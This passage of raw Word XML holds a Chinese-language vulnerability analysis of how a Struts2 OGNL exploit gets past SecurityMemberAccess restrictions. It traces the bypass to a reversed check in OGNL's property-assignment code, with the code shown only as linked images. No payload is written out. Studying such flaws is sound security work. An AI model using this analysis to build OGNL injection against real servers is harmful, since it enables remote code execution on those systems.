            <wp:docPr id="9" name="图片 9" descr="https://www.iswin.org/attach/struts2_poc_bypass_2.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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swin.org/attach/struts2_poc_bypass_2.png">
                      <a:hlinkClick r:id="rId20" tooltip="&quot;&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0380" cy="2341037"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这里可以看到上面圈起来的三个属性的修饰符是</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DefaultMemberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中判断了调用方法的修饰符，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32E3E71C" wp14:editId="6C25F390">
            <wp:extent cx="5580380" cy="2291132"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="https://www.iswin.org/attach/struts2_poc_bypass_3.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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iswin.org/attach/struts2_poc_bypass_3.png">
                      <a:hlinkClick r:id="rId22" tooltip="&quot;&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380" cy="2291132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果调用属性的修饰符为</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>时就默认通过，那么我是否可以直接对上述三个属性值进行修改，看样子好像是不行的，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的默认规则里面排除了该类型</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(MemberAccess),</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>但是要想去修改</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_memberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变量中私有的属性值</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>必须得将上述三个变量设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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我们再来看看</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SecurityMemberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>类中是如何对</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式进行限制的，</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.opensymphony.xwork2.ognl.SecurityMemberAccess.isAccessible(Map, Object, Member, String)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法最终进行判断的方法，部分代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FA7FD55" wp14:editId="2AAE7A2D">
            <wp:extent cx="5580380" cy="3915340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="https://www.iswin.org/attach/struts2_poc_bypass_5.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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swin.org/attach/struts2_poc_bypass_5.png">
                      <a:hlinkClick r:id="rId24" tooltip="&quot;&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0380" cy="3915340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="https://www.iswin.org/attach/struts2_poc_bypass_6.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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iswin.org/attach/struts2_poc_bypass_6.png">
                      <a:hlinkClick r:id="rId26" tooltip="&quot;&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647950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首先会按照默认规则进行判断，一旦不满足其中任何一个条件就会返回</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，表示该</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式不具备执行的条件，通过对默认的规则进行分析以及</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fuzz</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，发现新版本中的规则都很死，要想执行命令或者静态方法基本上不太现实，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>明明是能够成功调用静态方法以及</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对象和调用对象的任何方法，究竟是怎么回事？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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我把</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式的执行流程走了一遍，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>开发人员在对</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ONGL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式中的赋值操作时将判断条件写反了，这样一来就直接导致了前边做的所有的安全策略，在这里根本起不了作用，出问题的代码在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ognl.ObjectPropertyAccessor.setPossibleProperty(Map, Object, String, Object)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，该函数主要是对</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>语法树中的赋值表达式进行解析以及通过反射去完成相应的赋</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>值操作，具体代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FF64B30" wp14:editId="56AF719D">
            <wp:extent cx="5580380" cy="3166752"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="https://www.iswin.org/attach/struts2_poc_bypass_7.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId2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swin.org/attach/struts2_poc_bypass_7.png">
                      <a:hlinkClick r:id="rId28" tooltip="&quot;&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3166752"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我们先跟进</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ognl.OgnlRuntime.setMethodValue(OgnlContext, Object, String, Object, boolean)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法，如下</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49A6A170" wp14:editId="188C3063">
            <wp:extent cx="5580380" cy="4183017"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="https://www.iswin.org/attach/struts2_poc_bypass_8.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId3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iswin.org/attach/struts2_poc_bypass_8.png">
                      <a:hlinkClick r:id="rId30" tooltip="&quot;&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380" cy="4183017"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>也就是说如果</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ognl.OgnlRuntime.setMethodValue(OgnlContext, Object, String, Object, boolean)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法返回</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
